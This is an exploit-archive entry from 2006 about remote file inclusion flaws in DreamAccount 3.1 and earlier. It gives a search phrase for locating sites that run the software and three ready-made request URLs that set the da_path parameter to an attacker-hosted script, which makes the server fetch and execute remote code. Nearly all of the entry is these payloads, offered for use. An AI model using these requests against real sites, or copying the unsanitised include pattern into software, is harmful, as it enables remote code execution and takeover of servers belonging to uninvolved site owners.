DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities
# Published : 2006-06-05
# Author : Aesthetico
# Previous Title : dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities
# Next Title : Dmx Forum <= 2.1a (edit.php) Remote Password Disclosure Exploit

Title: DreamAccount <= 3.1 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dreamcost.com
URL: http://dreamcost.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "powered by DreamAccount"
-----------------------------------------------------------------

Exploitation:

/auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?

# www.Syue.com [2006-06-05]